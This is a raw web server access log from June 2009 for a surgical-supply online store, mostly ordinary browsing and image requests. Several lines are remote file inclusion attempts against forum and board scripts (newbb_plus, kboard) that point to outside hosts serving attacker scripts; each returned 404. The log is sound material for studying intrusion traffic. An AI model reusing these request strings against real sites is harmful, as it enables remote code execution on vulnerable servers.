38.99.44.103 - - [16/Jun/2009:01:19:22 -0400] "GET /logs/error_log.Q108030100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.175.71.121 - - [16/Jun/2009:01:19:31 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
81.175.71.121 - - [16/Jun/2009:01:19:33 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
98.208.102.56 - - [16/Jun/2009:01:20:15 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:15 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
214.1.240.252 - - [16/Jun/2009:01:20:15 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):09-000-16 HTTP/1.1" 200 38036 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
98.208.102.56 - - [16/Jun/2009:01:20:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:43 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
214.1.240.252 - - [16/Jun/2009:01:20:43 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2026BB4F6F222300EB4F01J+M37+ENG HTTP/1.1" 200 38026 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):09-000-16" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
199.120.90.222 - - [16/Jun/2009:01:20:44 -0400] "GET /logs/access_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:20:44 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:20:44 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
98.208.102.56 - - [16/Jun/2009:01:20:44 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:45 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:48 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:54 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0086BC496512E5000D8F09B+M37+ENG HTTP/1.1" 200 59304 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:56 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BC496512E5000D8F09B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:56 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BC496512E5000D8F09B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:20:56 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BC496512E5000D8F09B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
214.1.240.252 - - [16/Jun/2009:01:20:56 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2026BB4F6F222300EB4F01J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:20:57 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:20:57 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:00 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:00 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
38.99.13.118 - - [16/Jun/2009:01:21:03 -0400] "GET /images/_notes/ace_bkgrd_wide_r2_c2.jpg.mno HTTP/1.0" 200 265 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
214.1.240.252 - - [16/Jun/2009:01:21:22 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:23 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:23 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:24 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:24 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:24 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:24 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:24 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
98.208.102.56 - - [16/Jun/2009:01:21:24 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0086BC4569220500133F09B+M37+ENG HTTP/1.1" 200 45902 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BC496512E5000D8F09B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
214.1.240.252 - - [16/Jun/2009:01:21:24 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:25 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:25 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:25 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
98.208.102.56 - - [16/Jun/2009:01:21:25 -0400] "GET /images/items/0031161_THUMB.JPG HTTP/1.1" 200 1798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BC4569220500133F09B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
98.208.102.56 - - [16/Jun/2009:01:21:25 -0400] "GET /images/prev.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BC4569220500133F09B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)"
214.1.240.252 - - [16/Jun/2009:01:21:25 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:26 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:26 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:21:26 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
